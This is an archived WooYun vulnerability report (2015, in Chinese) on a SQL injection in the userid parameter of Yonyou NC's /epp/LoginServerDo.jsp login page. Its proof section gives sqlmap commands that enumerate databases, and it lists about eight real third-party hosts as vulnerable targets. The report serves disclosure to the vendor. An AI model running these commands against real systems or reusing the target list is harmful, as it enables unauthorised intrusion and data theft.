当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-094565

漏洞标题:用友NC综合办公系统前台SQL注入漏洞

相关厂商:用友软件

漏洞作者: error

提交时间:2015-01-29 15:27

修复时间:2015-04-29 15:28

公开时间:2015-04-29 15:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-29: 细节已通知厂商并且等待厂商处理中
2015-01-29: 厂商已经确认,细节仅向厂商公开
2015-02-01: 细节向第三方安全合作伙伴开放
2015-03-25: 细节向核心白帽子及相关领域专家公开
2015-04-04: 细节向普通白帽子公开
2015-04-14: 细节向实习白帽子公开
2015-04-29: 细节向公众公开

简要描述:

RT

详细说明:

用友NC综合办公系统登录接口SQL注入漏洞,可同时影响多个办公系统(HR资源管理系统、UFO报表系统等)的数据库
注入链接:/epp/LoginServerDo.jsp?userid=1111&pwd=2222
注入参数:userid

漏洞证明:

测试案例:
(1) http://zfkg.com:8081/

0.png


注入链接:http://zfkg.com:8081/epp/LoginServerDo.jsp?userid=1'&pwd=1

1.PNG


SQLMAP注入:
python sqlmap.py -u 'http://zfkg.com:8081/epp/LoginServerDo.jsp?userid=1&pwd=1' -p userid --level 5 --risk 3 --dbms oracle --batch --random-agent --current-db -v 3

2.png


python sqlmap.py -u 'http://zfkg.com:8081/epp/LoginServerDo.jsp?userid=1&pwd=1' -p userid --level 5 --risk 3 --dbms oracle --batch --random-agent --dbs -v 3

4.png

5.PNG


(2)http://nc.xhlbdc.com

6.PNG


注入链接:http://nc.xhlbdc.com/epp/LoginServerDo.jsp?userid=1'&pwd=1

7.PNG


SQLMAP注入:
python sqlmap.py -u 'http://nc.xhlbdc.com/epp/LoginServerDo.jsp?userid=1&pwd=1' -p userid --level 5 --risk 3 --dbms oracle --batch --random-agent --current-db -v 3

8.png


其他测试案例:
http://zfkg.com:8081/epp/LoginServerDo.jsp?userid=1'&pwd=1
http://erp.minyoun.com/epp/LoginServerDo.jsp?userid=1'&pwd=1
http://nc.xhlbdc.com/epp/LoginServerDo.jsp?userid=1'&pwd=1
http://61.175.97.50/epp/LoginServerDo.jsp?userid=1'&pwd=1
http://221.237.157.190/epp/LoginServerDo.jsp?userid=1'&pwd=1
http://119.2.10.186/epp/LoginServerDo.jsp?userid=1'&pwd=1
http://218.75.95.158:8081/epp/LoginServerDo.jsp?userid=1'&pwd=1
http://nc.pinggugroup.com:81/epp/LoginServerDo.jsp?userid=1'&pwd=1

修复方案:

过滤

版权声明:转载请注明来源 error@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-01-29 17:47

厂商回复:

这个问题已经有人提过了,正在给用户统一打补丁的过程中

最新状态:

暂无